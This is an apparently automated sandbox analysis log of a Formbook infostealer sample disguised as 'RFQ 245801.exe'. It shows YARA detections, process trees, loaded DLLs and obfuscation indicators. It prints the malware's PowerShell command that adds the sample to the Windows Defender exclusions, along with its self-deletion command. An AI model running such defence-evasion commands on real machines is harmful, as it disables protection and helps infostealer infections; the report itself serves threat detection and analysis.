Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: RFQ 245801.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@13/6@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 7_2_00641CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 7_2_00641C89
Source: C:\Users\user\Desktop\RFQ 245801.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 245801.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Users\user\Desktop\RFQ 245801.exe Mutant created: \Sessions\1\BaseNamedObjects\WIAEYG
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpfsdf0.kdq.ps1 Jump to behavior
Source: RFQ 245801.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ 245801.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\RFQ 245801.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RFQ 245801.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: snmpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\RFQ 245801.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: RFQ 245801.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ 245801.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: RFQ 245801.exe, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.5370000.3.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.2b5f4a8.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 6.2.explorer.exe.1120f840.0.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 7.2.NETSTAT.EXE.35ef840.3.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0E75 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0D50 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416825 push ecx; iretd 5_2_00416829
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_004168EA push ecx; ret 5_2_004168F6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417116 push ss; iretd 5_2_00417118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417132 push ecx; iretd 5_2_00417133
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041E9B2 push edx; iretd 5_2_0041E9B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041EA0C push 6B25699Fh; iretd 5_2_0041EA11
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416B3D push ds; retf 5_2_00416B4E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0040A47D pushad ; ret 5_2_0040A47E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4DB push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D53C push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F225F pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F27FA pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx 5_2_017209B6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F283D push eax; iretd 5_2_016F2858
